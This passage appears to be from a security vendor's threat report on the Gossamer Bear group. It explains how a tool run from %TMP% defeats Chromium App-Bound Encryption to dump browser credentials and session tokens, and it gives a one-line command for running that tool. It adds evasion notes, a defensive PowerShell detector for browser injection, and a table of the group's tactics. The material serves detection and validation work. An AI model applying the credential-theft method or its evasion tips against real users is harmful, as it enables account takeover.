Goal: Gossamer Bear runs a local App-Bound Encryption (ABE) decryption utility to extract saved credentials from a Chromium-based browser (Edge/Chrome) profile. ABE binds the key that protects the browser's password and cookie stores to the browser itself, so a tool running as the user can no longer recover them with plain DPAPI calls; the utility has to obtain the app-bound key through the browser's own decryption path.
Method: Execute a tool from a writable location that obtains the app-bound key via the browser's decryption APIs and local key material, then decrypts and dumps stored logins, cookies, and session tokens.
How it hides
• Runs in the current user context (no elevation required), which keeps it out of alerts focused on privilege escalation.
• Uses the browser's own crypto/APIs and local profile files rather than brute-force methods. The tool name (chrome_inject) suggests it operates from inside the browser process, so injection into chrome.exe/msedge.exe (Sysmon Event ID 8 CreateRemoteThread, Event ID 10 ProcessAccess) and unexpected DLL loads into the browser (Event ID 7) are the telemetry to watch.
• Executes from a benign-looking path (%TMP%), blending with normal user-launched tooling.
How Does Picus Help?
Picus SCV runs the same ABE decryption flow to validate whether endpoint, file-access, and process-monitoring controls detect local credential access, profile file reads, and suspicious decryption activity.
%TMP%\chrome_inject.exe -s edge
Payload explanation
- The tool accesses the browser profile, uses the browser's decryption path to recover the app-bound key, and exports saved logins, cookies, or session tokens for collection.
The sequence simulates an attacker harvesting browser-stored credentials to support lateral movement or account takeover and tests whether defenders log and alert on local credential access and browser process tampering.
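As an added example (not Picus or actor code), the PowerShell below applies two checks to constructed Sysmon-style records: a non-browser process creating a remote thread in a browser (Event ID 8), and a DLL loaded into a browser from a user-writable path (Event ID 7). The chrome_inject.exe source path, the abe.dll name and the browser install paths are assumptions, and the Event ID 7 record uses TargetImage for the loading process (Sysmon's own field is Image).

```powershell
# Added example: browser-tampering checks over constructed Sysmon-style records.
# EventId 8 = CreateRemoteThread (SourceImage -> TargetImage)
# EventId 7 = ImageLoad (TargetImage here stands in for Sysmon's Image; ImageLoaded is the DLL)
$Browsers     = 'chrome.exe', 'msedge.exe', 'brave.exe'
$UserWritable = '\\Temp\\', '\\AppData\\', '\\ProgramData\\', '\\Public\\', '\\Downloads\\'

$SampleEvents = @(
    [pscustomobject]@{ EventId = 8; SourceImage = 'C:\Users\alice\AppData\Local\Temp\chrome_inject.exe'
                       TargetImage = 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'; ImageLoaded = $null }
    [pscustomobject]@{ EventId = 7; SourceImage = $null
                       TargetImage = 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'
                       ImageLoaded = 'C:\Users\alice\AppData\Local\Temp\abe.dll' }
    # Benign control: the browser creating threads in its own renderer processes
    [pscustomobject]@{ EventId = 8; SourceImage = 'C:\Program Files\Google\Chrome\Application\chrome.exe'
                       TargetImage = 'C:\Program Files\Google\Chrome\Application\chrome.exe'; ImageLoaded = $null }
)

function Get-Leaf ([string] $Path) { (($Path -split '[\\/]')[-1]).ToLower() }

function Test-BrowserTamper {
    param([Parameter(Mandatory)] $Event)
    $target = Get-Leaf $Event.TargetImage
    if ($target -notin $Browsers) { return }
    switch ($Event.EventId) {
        8 {
            # A browser spawning threads in its own processes is normal; anything else is not
            if ((Get-Leaf $Event.SourceImage) -ne $target) {
                [pscustomobject]@{ Rule = 'remote thread into browser'; Source = $Event.SourceImage; Target = $Event.TargetImage }
            }
        }
        7 {
            if ($UserWritable | Where-Object { $Event.ImageLoaded -match $_ }) {
                [pscustomobject]@{ Rule = 'DLL from user-writable path loaded into browser'; Source = $Event.ImageLoaded; Target = $Event.TargetImage }
            }
        }
    }
}

$SampleEvents | ForEach-Object { Test-BrowserTamper $_ } | Format-Table -AutoSize
```

The first two constructed records produce one finding each and the self-injection control produces none; the same two rules, fed from the live Sysmon channel, cover the injection-based ABE tooling this technique describes without depending on the tool's file name.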
How Does Picus Help Defend Against Gossamer Bear APT Attacks?
The Picus Security Validation Platform safely simulates the Gossamer Bear Windows endpoint campaign. Through the Picus Threat Library, it replicates the tactics, techniques, and procedures (TTPs) observed in these campaigns to reveal detection and prevention gaps across EDR, NGFW, and SIEM technologies before adversaries can exploit them.
You can also test your defenses against hundreds of other threat groups and malware variants, such as Salt Typhoon APT, APT28, and Lazarus APT, within minutes with a 14-day free trial of the Picus Platform.
| Threat ID | Threat Name | Attack Module |
|---|---|---|
| 24801 | Gossamer Bear Threat Group Campaign | Windows Endpoint |
Key Takeaways
| Tactic | Key Takeaway |
|---|---|
| Defense Evasion | LotL Execution: The group uses the signed system binary Rundll32 to load and execute malicious DLLs, evading simple allowlists and blending with trusted processes. |
| Defense Evasion | Resilient Staging: Gossamer Bear abuses Background Intelligent Transfer Service (BITS) jobs to quietly download and stage payloads resiliently across reboots and network interruptions. |
| Defense Evasion | Proxy Process Launch: The threat actors obscure their execution by launching malicious processes under benign, legitimate parents like winver.exe to muddy process lineage. |
| Defense Evasion | Forensic Cleanup: They use reg.exe to delete the RunMRU registry key, erasing the Windows Run dialog command history to remove forensic evidence. |
| Execution | Fileless Execution: Attackers use Base64-encoded PowerShell commands to fetch and run subsequent payloads directly in memory, avoiding disk artifacts. |
| Persistence | Scheduled Task: Persistence is established by creating a new Scheduled Task through the TaskScheduler COM API, which blends into normal system scheduling mechanisms. |
| Persistence | Registry Autorun: They leverage the HKLM Registry Run key to ensure payload execution at user logon, chaining a trusted binary like cmstp.exe with a crafted INF argument. |
| Discovery | Host Profiling: Gossamer Bear collects comprehensive host data, including OS version, patch levels, and network adapters, using the systeminfo.exe utility. |
| Discovery | Network Mapping: The ipconfig /all and netstat -nao commands are used to map the host's network configuration and active connections for lateral movement planning. |
| Credential Access | Browser Harvesting: The group targets installed browsers and runs local decryption tools to harvest saved credentials, cookies, and session tokens from browser profile data. |